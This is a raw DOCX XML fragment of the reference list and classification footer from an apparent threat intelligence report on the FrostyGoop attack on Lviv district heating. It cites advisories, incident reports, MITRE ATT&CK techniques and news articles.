      </w:hyperlink>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[2] Security Service of Ukraine (SBU), "Cyber Attack on Lviv District Heating," CSSC Report UKCS-2024-0122, January 24, 2024.</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[3] Dragos Inc., "The Evolution of ICS Malware: From Stuxnet to FrostyGoop," Industrial Cybersecurity Report, April 2024.</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[4] CISA, "Alert AA24-179A: Mitigating Cyber Threats to Operational Technology," Cybersecurity and Infrastructure Security Agency, June 28, 2024.</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[5] Dragos Inc., "FrostyGoop Technical Analysis," Malware Analysis Report MAR-2024-04, April 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_htpj75ywlrb5" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[28] Mikrotik, "RouterOS Security Advisory: Default Credentials," Security Notice MTK-2023-11, November 2023.</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[29] CISA, "ICS Advisory ICSA-24-025-01: Mikrotik RouterOS Vulnerabilities," January 25, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_89b4czni4bh" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[35] Lvivteploenergo, "Post-Incident Analysis: January 2024 Heating Disruption," Internal Report (translated), February 2024.</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[36] Ekonomichna Pravda, "Heating Outage Affects 100,000 in Lviv," Ukrainian News Report, January 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.epravda.com.ua/news/2024/01/23/709063/</w:t>
        </w:r>
      </w:hyperlink>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[55] Ukraine Cyber Security Situation Center, "Technical Report: FrostyGoop Attack on Critical Infrastructure," CSSC-TR-2024-001, February 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g3ch4sh4hsfk" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[54] MITRE ATT&amp;CK, "T1133: External Remote Services," Enterprise Matrix v14.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T1133/</w:t>
        </w:r>
      </w:hyperlink>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[60] MITRE ATT&amp;CK for ICS, "T0846: Remote System Discovery," v2.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T0846/</w:t>
        </w:r>
      </w:hyperlink>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[62] MITRE ATT&amp;CK for ICS, "T0821: Modify Controller Tasking," v2.1, October 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://attack.mitre.org/techniques/T0821/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7r7enyrsf4l1" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">News and Media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] WIRED, "How Russia-Linked Malware Cut Heat to 600 Ukrainian Buildings in Winter," July 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.wired.com/story/russia-ukraine-frostygoop-malware-heating-utility/</w:t>
        </w:r>
      </w:hyperlink>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[10] SecurityWeek, "FrostyGoop ICS Malware Left Ukrainian City's Residents Without Heating," July 23, 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rcwfxs7qbh8l" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industry Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Field Effect, "FrostyGoop Malware Freezes Ukrainian Power Company," Field Effect Blog, July 2024. </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://fieldeffect.com/blog/frostygoop-malware-freeze-ukraine</w:t>
        </w:r>
      </w:hyperlink>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[46] Industrial Cyber, "Analysis: Infrastructure Dependencies in District Heating Attacks," February 2024.</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[References continue through [96] - truncated for length]</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLP:AMBER+STRICT - Critical Infrastructure Community</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Energy Sector Leadership and Authorized Security Personnel</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expiration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This intelligence assessment expires 90 days from publication</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NCC-OTCE-Intelligence@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 1-800-XXX-XXXX</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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Nightingale: "Clean water, reliable energy, and access to healthy food for our grandchildren"</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attack.mitre.org/techniques/T0821/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T0846/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/russia-ukraine-frostygoop-malware-heating-util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ttack.mitre.org/techniques/T1133/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:NCC-OTCE-Intelligence@nccgroup.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fieldeffect.com/blog/frostygoop-malware-freeze-ukraine" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:otce-response@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.dragos.com/hubfs/Reports/Dragos-FrostyGoop-ICS-Malware-Intel-Brief-0724_.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.epravda.com.ua/news/2024/01/23/7090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